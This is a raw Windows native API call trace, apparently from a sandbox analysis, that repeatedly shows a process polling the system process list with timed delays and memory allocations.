NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.859] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.891] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.907] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.921] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.936] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.952] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.968] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.983] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.000] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.014] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.034] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.061] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.077] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.093] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.124] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.140] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.155] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.170] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0159.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0159.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0159.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0159.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0159.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0159.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0159.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 